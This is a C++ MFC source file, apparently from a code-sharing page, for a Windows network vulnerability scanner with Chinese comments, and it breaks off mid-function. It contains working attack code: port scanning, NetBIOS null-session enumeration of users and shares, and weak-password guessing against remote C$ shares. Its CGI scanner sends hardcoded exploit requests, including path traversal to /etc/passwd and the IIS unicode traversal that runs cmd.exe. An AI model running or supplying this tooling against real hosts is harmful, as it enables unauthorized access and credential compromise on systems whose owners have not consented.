📄 try4view.cpp
字号:
// try4View.cpp : implementation of the CTry4View class
//
#include "stdafx.h"
#include "try4.h"
#include "try4Doc.h"
#include "try4View.h"
#include "CParamDlg.h"
#include "CModuleDlg.h"
#include "CHostName.h"
#include "CIPAddr.h"
#include "CNETTOIP.h"
#include "CPing.h"
#include "afxmt.h"
#include "CSocketFun.h"
#include "CNetBios.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#define LOCALDRIVE "x:"
extern int gnScanOptions[5];
extern int gnStartPort;
extern int gnEndPort;
extern DWORD gdwStartIPAddr;
extern CString strStartIPAddr;
extern int nMaxHop;
extern int nMaxThread;
BOOL bStoped=true;
CString gMessage;
int nCount=0;
HTREEITEM hTreeCurrent;
CString strTreeCurrent;
// 文本框输出函数
void AddToEdit(HWND hWnd,CString sg,CString strHost)
{
CString s;
s.Format("\r\n[%s]%s",strHost,sg);
gMessage+=s;
::SetWindowText(hWnd,gMessage);
::UpdateWindow(hWnd);
}
//@@@@@@@@@@@@@@@@@@@ 扫描路由信息函数 ~~~~~~~~~~~~~BEGIN
typedef struct ThreadParam_Route
{
CString strHost;
CTreeCtrl *pTC;
HTREEITEM hTI;
}ROUTETHREADPARAM;
ROUTETHREADPARAM rtp;
UINT GetTraceInfo(LPVOID pParam)
{
ROUTETHREADPARAM *route=(ROUTETHREADPARAM *)pParam;
//CString strHost,CTreeCtrl *pTC,HTREEITEM hTI
int MaxHop=0;
int ttl;
CPing ping;
struct in_addr iaDest;
LPHOSTENT pHost,pHost1;
DWORD dwAddress;
IPINFO ipInfo;
ICMPECHO icmpEcho;
HANDLE hndlFile;
if(!ping.bValid)
{
return 0;
}
iaDest.S_un.S_addr = inet_addr(route->strHost);
if (iaDest.S_un.S_addr == INADDR_NONE)
{
pHost = gethostbyname(route->strHost);
}
else
{
pHost = gethostbyaddr((const char *)&iaDest,sizeof(struct in_addr), AF_INET);
}
if (pHost == NULL)
{
return 0;
}
dwAddress = *(DWORD *)(*pHost->h_addr_list);
hndlFile = ping.pIcmpCreateFile();
ipInfo.Tos = 0;
ipInfo.IPFlags = 0;
ipInfo.OptSize = 0;
ipInfo.Options = NULL;
icmpEcho.Status = 0;
if (hndlFile!=0)
{
for(ttl=1;ttl<=255&&!bStoped;ttl++)
{
ipInfo.Ttl = ttl;
int ttlAdjust;
CString sHostIP;
if(ping.pIcmpSendEcho(hndlFile,dwAddress,NULL,0,&ipInfo,&icmpEcho,sizeof(struct tagICMPECHO),1000)==1)
{
iaDest.S_un.S_addr=icmpEcho.Address;
sHostIP= inet_ntoa(iaDest);
pHost1=gethostbyaddr((const char *)&iaDest,sizeof(struct in_addr),AF_INET);
if (pHost1==NULL)
{
route->pTC->InsertItem(sHostIP,2,2,route->hTI,TVI_LAST);
MaxHop++;
}
else
{
CString temp;
temp.Format("%s[%s]",sHostIP,pHost->h_name);
route->pTC->InsertItem(temp,2,2,route->hTI,TVI_LAST);
MaxHop++;
}
ttlAdjust=0;
}
else
ttlAdjust = 1;
if(MaxHop>=nMaxHop) //超过最大跳数
break;
ttl=ttl - ttlAdjust;
if (sHostIP==route->strHost)
{
break;
}
}
ping.pIcmpCloseHandle(hndlFile);
}
else
{
AfxMessageBox("Can't Open ICMP Handle!");
}
return 0;
}
//~~~~~~~~~~~~~~~~~~~~ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ End
//%%%%%%%%%%%%%%%%%%%% 扫描端口线程 %%%%%%%%%%%%%%%%%%%%%%%%%%% BEGIN
CCriticalSection cs;
int NowWhere=0;
typedef struct ThreadParam2
{
int nStartPort;
int nEndPort;
HWND hwnd;
CString strHost;
CTreeCtrl *pTC;
HTREEITEM hTI;
}THREADPARAM2;
THREADPARAM2 tp2;
UINT ScanPort(LPVOID pParam)
{
THREADPARAM2* ThreadParam2=(THREADPARAM2*)pParam;
int nPort;
SOCKET conn;
CSocketFun sf;
sf.StartUp();
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ThreadParam2->strHost);
for(nPort=ThreadParam2->nStartPort;(nPort<=ThreadParam2->nEndPort)&&(NowWhere<=ThreadParam2->nEndPort)&&!bStoped;nPort++)
{
conn=socket(AF_INET,SOCK_STREAM,0);
if(conn==INVALID_SOCKET)
{
AfxMessageBox("Can't Create Socket!");
sf.CleanUp();
return 0;
}
//临界段操作,保护共享变量NowWhere
cs.Lock();
nPort=NowWhere;
NowWhere++;
cs.Unlock();
addr.sin_port=htons(nPort);
int ddd=connect(conn,(sockaddr *)&addr,sizeof(addr));
if(ddd==SOCKET_ERROR)
{
}
else
{
CString temp;
temp.Format("\r\n[%s]端口: %d 开放!",ThreadParam2->strHost,nPort);
gMessage+=temp;
CString sss;
sss.Format("端口: %d 开放",nPort);
(ThreadParam2->pTC)->InsertItem(sss,2,2,ThreadParam2->hTI,TVI_LAST);
}
closesocket(conn);
::SetWindowText(ThreadParam2->hwnd,gMessage);
}
sf.CleanUp();
return 0;
}
//%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%END
//=================== 扫描NetBios信息函数 ===================BEGIN
void GetNetBios(HWND hWnd,CString strHost,CTreeCtrl *pTC,HTREEITEM hTI)
{
CNetBios nb;
char cHost[100];
CString str;
wsprintf(cHost,_T("%s"),strHost);
if(!nb.OpenSession(cHost))
{
AddToEdit(hWnd,"建立IPC$空会话失败",strHost);
return;
}
else
{
nb.GetUsers(cHost,str);//(TCHAR *)&m_strHost
if(str!="")
{
AddToEdit(hWnd,"获取Netbios信息\"网络用户列表\"完成",strHost);
pTC->InsertItem("用户列表",2,2,hTI,TVI_LAST);
}
nb.GetShareList(cHost,str);
if(str!="")
{
AddToEdit(hWnd,"获取Netbios信息\"网络共享列表\"完成",strHost);
pTC->InsertItem("共享列表",2,2,hTI,TVI_LAST);
}
nb.FingerPrint(cHost,str);
if(str!="")
{
AddToEdit(hWnd,"获取Netbios信息\"远程操作系统信息\"完成",strHost);
pTC->InsertItem("远程操作系统信息",2,2,hTI,TVI_LAST);
}
nb.CloseSession(nb.ipc);
}
}
//==========================================================END
//!!!!!!!!!!!!!!!! 扫描NT Server弱口令函数 !!!!!!!!!!!!! BEGIN
void GetNTWkPass(HWND hWnd,CString strHost,CTreeCtrl *pTC,HTREEITEM hTI)
{
FILE *fp;
CString str;
TCHAR name[20],nameid[20];
CNetBios nb;
TCHAR Host[100]=_T("");
wsprintf(Host,"%s",strHost);
if((fp=fopen("users.txt","r"))==NULL)
{
AfxMessageBox("Can't Open File!");
return;
}
while(fgets(name,20,fp)!=NULL)
{
strncpy(nameid,"",20);
strncpy(nameid,name,strlen(name)-1);
strncpy(name,"",20);
TCHAR password[20]=_T("");
char addr[60];
wsprintf(addr,_T("\\\\%s\\c$"),Host);
NETRESOURCE nr;
DWORD ret;
nr.lpProvider = NULL;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = LOCALDRIVE;
nr.lpRemoteName = addr;
ret = WNetAddConnection2(&nr,password,nameid,0);
if(ret==NO_ERROR)
{
CString str1;
str1.Format("发现NT Server弱口令: %s/[空口令]",nameid);
AddToEdit(hWnd,str1,strHost);
CString str2;
str2.Format("%s([空口令])",nameid);
pTC->InsertItem(str2,2,2,hTI,TVI_LAST);
WNetCancelConnection2(LOCALDRIVE,0,TRUE);
continue;
}
ret = WNetAddConnection2(&nr,nameid,nameid,0);
if(ret==NO_ERROR)
{
CString str1;
str1.Format("发现NT Server弱口令: %s/[用户名和口令相同]",nameid,nameid);
AddToEdit(hWnd,str1,strHost);
CString str2;
str2.Format("%s([用户名和口令相同])",nameid);
pTC->InsertItem(str2,2,2,hTI,TVI_LAST);
WNetCancelConnection2(LOCALDRIVE,0,TRUE);
}
}
fclose(fp);
}
//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! END
//################### 扫描CGI漏洞函数 #################### BEGIN
void CGIScan(HWND hWnd,CString strHost,CTreeCtrl *pTC,HTREEITEM hTI)
{
struct sockaddr_in addr;
WSADATA wsaData;
WORD wVersionRequested;
SOCKET sck;
int i;
char buff[1024];
char *CGI[10];
char *fmsg="HTTP/1.1 200 OK";
CGI[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";
CGI[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
CGI[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";
CGI[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";
CGI[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";
CGI[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
wVersionRequested = MAKEWORD( 1, 1 );
if (WSAStartup(wVersionRequested , &wsaData)){
AfxMessageBox("Winsock Initialization failed.");
return ;
}
if ((sck=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
AfxMessageBox("Can not create socket.");
return ;
}
sck = socket(AF_INET,SOCK_STREAM,0);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
addr.sin_addr.s_addr= inet_addr(strHost);
for (i=1 ; i<7&&!bStoped; i++) {
if (connect(sck,(struct sockaddr*)&addr,sizeof(addr))==0){
send(sck,CGI[i],strlen(CGI[i]),0);
recv(sck,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
CString temp;
temp.Format("发现CGI漏洞: %s ",CGI[i]);
AddToEdit(hWnd,temp,strHost);
pTC->InsertItem(CGI[i],2,2,hTI,TVI_LAST);
}
}
}
closesocket(sck);
WSACleanup();
}
//############################################################## END
//^^^^^^^^^^^^^^^^^^ 总扫描线程 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^BEGIN
typedef struct ThreadParam1
{
HWND hWnd;
HWND hwnd;
CTreeCtrl *pTC;
}THREADPARAM1;
THREADPARAM1 tp1;
UINT StartScan(LPVOID pParam)
{
THREADPARAM1 *threadparam1=(THREADPARAM1 *)pParam;
// threadparam1->pTC->DeleteAllItems();
gMessage=_T("");
CString str;
str.Format("正在检测 %s...\r\n",strStartIPAddr);
gMessage+=str;
::SetWindowText(threadparam1->hWnd,gMessage);
::UpdateWindow(threadparam1->hWnd);
HTREEITEM hRoot=(threadparam1->pTC)->InsertItem(strStartIPAddr,0,0,TVI_ROOT,TVI_FIRST);
::UpdateWindow(threadparam1->hwnd);
CPing ping;
BOOL bResult = ping.Ping((char*)(LPCTSTR)strStartIPAddr);
// HWND hWnd=GetDlgItem(IDC_EDIT1)->GetSafeHwnd();
// HWND MainWnd=CWnd::m_hWnd;
if(bResult&&!bStoped)
{
if(gnScanOptions[0]==1)
{
AddToEdit(threadparam1->hWnd,"正在检测路由信息...",strStartIPAddr);
HTREEITEM hCh1=(threadparam1->pTC)->InsertItem("路由信息",1,1,hRoot,TVI_FIRST);
// (threadparam1->pTC)->InsertItem("172.....",2,2,hCh1,TVI_FIRST);
rtp.strHost = strStartIPAddr;
rtp.pTC = threadparam1->pTC;
rtp.hTI = hCh1;
AfxBeginThread(GetTraceInfo,&rtp,THREAD_PRIORITY_IDLE);
//(strStartIPAddr,threadparam1->pTC,hCh1);
AddToEdit(threadparam1->hWnd,"发现路由信息",strStartIPAddr);
AddToEdit(threadparam1->hWnd,"路由信息扫描完成",strStartIPAddr);
nCount++;
}
else
nCount++;
if(gnScanOptions[1]==1)
{
AddToEdit(threadparam1->hWnd,"正在检测开放端口...",strStartIPAddr);
HTREEITEM hCh2=(threadparam1->pTC)->InsertItem("开放端口",1,1,hRoot,TVI_LAST);
NowWhere=gnStartPort;
tp2.nStartPort = gnStartPort;
tp2.nEndPort = gnEndPort;
tp2.hwnd = threadparam1->hWnd;
tp2.strHost = strStartIPAddr;
tp2.pTC = threadparam1->pTC;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -